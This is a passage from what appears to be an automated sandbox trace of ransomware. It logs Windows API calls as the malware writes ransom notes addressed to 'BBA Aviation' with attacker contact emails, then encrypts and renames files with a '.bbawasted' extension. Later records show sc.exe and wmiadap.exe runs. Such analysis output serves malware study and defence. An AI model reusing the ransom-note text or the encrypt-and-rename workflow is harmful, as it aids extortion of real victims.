(hObject=0x28c) returned 1 [0241.048] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0241.056] CloseHandle (hObject=0x290) returned 1 [0241.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0241.056] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6818) returned 1 [0241.057] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0241.057] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0241.057] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0241.058] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0241.058] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0241.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0241.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0241.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0241.070] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]aRtiTUZ8a8IOPTJO7qs4D64sxQH4CpjiPUma6LlNPAapyM1SITid8cNlCMsCKl+p\r\nEqicwn8dd+6LCwXEpGyrRHIztrbwQ51I/GMjqRGgE0+pF5BKE6O3ojO2vB18Xtqr\r\nkbVauHQBVkTR3FXgE2MnotiOrHyvxO4b6a4Rh3gxmgRi1yA6NqdviLc0JdGH7yUa\r\nO8tzmmzaT4++1lHdYVznv7s492bo0oXmFXxNsC5zp6YyKOJTiId2A+axFpPyfzFt\r\nOtdaWArxhVEmqmqzhiwKFIRDGtgnivNcwQVJbYlbjUBeNv4A5zwrOD6PWhZj6uhI\r\ns3U0WjBQQTGp/YhKcHAHz2KSpUQbddozbuyjJegILKy3afudEwkxIEq2R2wRuUx1\r\naB78Mtz/q+54zq1edJuo4w5Rq/BvRsEf5MQbNDFL42lItknvdlsGZ4/Se7+RXIBK\r\nillwNM1bFwUKZsGCsxZZlQroSR90l6IuoVQeP4YhVAg8IqOneQoXHUnRv/xooNEL\r\nd0J3IxxxVPd2NA/QvKR8R5OBBJV8eInFaSc3mSYEXkDaNWsIUOxOPFeiXGulNgis\r\nr63nuMMAbkHN246KAbciRg73vv4sDZD7dGnEVs+y8dKU4Iz1BuN1oGQah5KEJdL6\r\nTyaA+ojXr/gbT4orfNfuKBRLQ9UaIyaWaD4i0usdF5A=[end_key]\r\nKEEP IT\r\n") returned 984 [0241.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0241.070] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0241.071] SetEndOfFile (hFile=0x27c) returned 1 [0241.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0241.194] CloseHandle (hObject=0x27c) returned 1 [0241.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0241.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2818 | out: hHeap=0x660000) returned 1 [0241.195] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0241.196] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0241.196] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0241.196] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\pass.png") returned 45 [0241.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6ad900 [0241.196] lstrcpyW (in: lpString1=0x6ad95a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0241.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.197] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a68a0) returned 1 [0241.197] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0241.197] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0241.197] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\pass.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0241.199] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0241.200] SetEndOfFile (hFile=0x27c) returned 1 [0241.201] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0241.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.201] lstrcpyW (in: lpString1=0x6ad95a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0241.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\pass.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\pass.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png.bbawasted")) returned 1 [0241.202] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\pass.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0241.202] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0241.202] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x71e [0241.202] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x71e) returned 0x600000 [0241.203] CloseHandle (hObject=0x280) returned 1 [0241.204] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0241.204] CloseHandle (hObject=0x28c) returned 1 [0241.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa9f0 [0241.204] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0241.205] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x6aaa38 | out: pbBuffer=0x6aaa38) returned 1 [0241.205] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0241.205] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0241.206] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0241.206] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0241.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0241.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa9f0 | out: hHeap=0x660000) returned 1 [0241.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.219] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kHvo85CCBErYTzExZQ+5vzbKx7opTR+DpA2qfuiYjt7NPVP8vfW4WI83y7g7qRep\r\nqa1x/SwACIV/H1EvUImXQMRaOo78SmHdov5ZwRMM/IIRNSfzxpOCdBt/dGiHohPO\r\nbt8sVcnzj/MDB7GezhCRUhvXG87xO6InWjR8bmT8BiFW+Wo56zYBZ5l7ghvRO62a\r\n4fJEhhXUzzY4rIoups3uo5skAWi6XR6nihSj1HN8MK0GrcBgU4befzpFpwsBv0G8\r\ndYq46B6eAuuUDaG5XeL3EQmrB/s71VWfaGukWIhiKdzGHhI+iwi/PDEj4yAIjZ8l\r\nfF8K/NoS1JdUKbhme506A6mRjU7lyMNy9DK9mn3HZtHfWbCOIlKCew9gfsq5nxXl\r\nZMaorBmoLqYI6M0WkvOcBs3V00w/HlhLG+xSayOlES2o3E+oBH4FVhUv7QpZYkXJ\r\nbwfl0JGOVWeupMrPe2mYsnB9xeDmpBRAcgMRyOk/8bl4+IUOJSp+wSVVSkQ0CnIF\r\nVFz1HE5ohvUsIADApm8HxXUL8tu9DXi185nQ9G5/OKfzW7WTVoaOBuc1MC7js3Zh\r\nZt62fJdkOhNwFikPKUnHYtmsSocD41l4y8M6TwmIKM5kwlKbtAtsggYhsAf9LZBO\r\nlnRNFHfdFS+F3UEG7SS7nGOS0fRRwbktb43tBVaGHfq=[end_key]\r\nKEEP IT\r\n") returned 984 [0241.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0241.219] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0241.219] SetEndOfFile (hFile=0x27c) returned 1 [0241.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.222] CloseHandle (hObject=0x27c) returned 1 [0241.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0241.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bd388 | out: hHeap=0x660000) returned 1 [0241.223] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0241.224] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0241.224] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0241.224] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\upgrader_default.log") returned 44 [0241.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6ad900 [0241.224] lstrcpyW (in: lpString1=0x6ad958, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0241.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0241.224] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0241.225] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0241.225] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0241.225] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_default.log.bbawasted_info" (normalized: "c:\\windows10upgrade\\upgrader_default.log.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0241.226] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0241.227] SetEndOfFile (hFile=0x27c) returned 1 [0241.228] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0241.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0241.228] lstrcpyW (in: lpString1=0x6ad958, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0241.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_default.log" (normalized: "c:\\windows10upgrade\\upgrader_default.log"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_default.log.bbawasted" (normalized: "c:\\windows10upgrade\\upgrader_default.log.bbawasted")) returned 1 [0241.371] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\upgrader_default.log.bbawasted" (normalized: "c:\\windows10upgrade\\upgrader_default.log.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0241.371] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0241.372] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3d14a [0241.372] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d14a) returned 0x5f0000 [0241.372] CloseHandle (hObject=0x294) returned 1 [0241.382] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0241.386] CloseHandle (hObject=0x28c) returned 1 [0241.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0241.386] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0241.387] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0241.387] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0241.387] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a63d8) returned 1 [0241.388] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0241.388] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0241.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0241.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0241.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0241.400] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ooguFxJs618SjNV9FAQPbvcBT86RJVrkQ8B1zY0jtHIaFdreTpX/F1UKNzr8NUkK\r\nrPx7JyYS4bxOlWEvtV61WDUrMHP42TbRndBI95uUTBWGvKeUArv4chXlRMgF4MBq\r\nCAxAfj8YJV2OdKUkYqOb2g6zcu4a/N2RwRLjXDI3BmBSf9blah5ulQQLtkHbwf7g\r\n4pyrXdu9ZN2UWAHEvclQNLuSavK3bejePNypMELrakKQWYY6wK4Q+a/7a9fdVtSa\r\nfgmDFp8C1YtYwb8vWc0K3zDegkoYxUPfyjoZenClOWgWerdspd36LBaFoxrs4TUS\r\nPZ2lpYSvVDnkiQdhRLE/MlJ/z0jHmYCpRv8OCn8R5cmFT6hnGQAPpvCu7HCHWV09\r\nN8c5MeVFEa1iYFnpqdfRZ3LWk3evyTIF34Won050W61VWG7E9l/VdSb7YyR27eVm\r\n/gHDLQ/7DcJqA0CmDIuLrsQUoSsxgGKpcvmMtefGNiQkZjK2n+Jk7l84ept8kFeu\r\nc6KvcBy+WDBAcQWbQbE9D0E6Wd6teJd9l4UKFVeSCqLKfMPUeunH9dllNusMC62q\r\nw0aLsSJrWGnFofVY0N/jLxqNSJamU3HCdxxQh0m/5MOI8my9biXanVlXUSf+KwAG\r\nwLFOECbDhThReatNDsTACxmabfFjVYcvAnaUqzzGZpD=[end_key]\r\nKEEP IT\r\n") returned 984 [0241.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0241.401] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0241.401] SetEndOfFile (hFile=0x27c) returned 1 [0241.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0241.422] CloseHandle (hObject=0x27c) returned 1 [0241.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0241.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bd4f8 | out: hHeap=0x660000) returned 1 [0241.423] WaitForMultipleObjects (nCount=0x2, lpHandles=0x147ff78*=0x274, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 Process: id = "32" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x1d486000" os_pid = "0xf18" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x3ac" cmd_line = "C:\\WINDOWS\\system32\\sc.exe start wuauserv" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 511 os_tid = 0xcdc [0209.518] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6fe2b0000 [0209.518] __set_app_type (_Type=0x1) [0209.519] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6fe2b22b0) returned 0x0 [0209.519] __wgetmainargs (in: _Argc=0x7ff6fe2c1028, _Argv=0x7ff6fe2c1030, _Env=0x7ff6fe2c1038, _DoWildCard=0, _StartInfo=0x7ff6fe2c1044 | out: _Argc=0x7ff6fe2c1028, _Argv=0x7ff6fe2c1030, _Env=0x7ff6fe2c1038) returned 0 [0209.519] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.521] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0209.521] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0209.521] _wcsicmp (_String1="start", _String2="query") returned 2 [0209.521] _wcsicmp (_String1="start", _String2="queryex") returned 2 [0209.521] _wcsicmp (_String1="start", _String2="start") returned 0 [0209.522] ResolveDelayLoadedAPI () returned 0x7ffce9434cf0 [0209.525] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) [0214.260] OpenServiceW (hSCManager=0x25a7ec789e0, lpServiceName="wuauserv", dwDesiredAccess=0x14) returned 0x25a7ec76b30 [0214.262] StartServiceW (hService=0x25a7ec76b30, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 0 [0214.263] GetLastError () returned 0x420 [0214.263] _ultow (in: _Dest=0x420, _Radix=1218967064 | out: _Dest=0x420) returned="1056" [0214.263] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x420, dwLanguageId=0x0, lpBuffer=0x7ff6fe2c1640, nSize=0x400, Arguments=0x0 | out: lpBuffer="An instance of the service is already running.\r\n") returned 0x30 [0214.266] FormatMessageW (dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x8248a7f5d0, nSize=0x2, Arguments=0x8248a7f600) [0219.163] GetFileType (hFile=0x50) returned 0x2 [0219.163] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x8248a7f580 | out: lpMode=0x8248a7f580) returned 1 [0219.164] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x25a7ec76800*, nNumberOfCharsToWrite=0x54, lpNumberOfCharsWritten=0x8248a7f578, lpReserved=0x0 | out: lpBuffer=0x25a7ec76800*, lpNumberOfCharsWritten=0x8248a7f578*=0x54) returned 1 [0219.165] LocalFree (hMem=0x25a7ec76800) returned 0x0 [0219.165] LocalFree (hMem=0x0) returned 0x0 [0219.165] CloseServiceHandle (hSCObject=0x25a7ec76b30) returned 1 [0219.165] CloseServiceHandle (hSCObject=0x25a7ec789e0) returned 1 [0219.166] LocalFree (hMem=0x0) returned 0x0 [0219.166] exit (_Code=1056) Thread: id = 552 os_tid = 0x4fc Thread: id = 554 os_tid = 0x4fc Thread: id = 556 os_tid = 0x4fc Process: id = "33" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0xa3c4000" os_pid = "0xd98" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x3ac" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 513 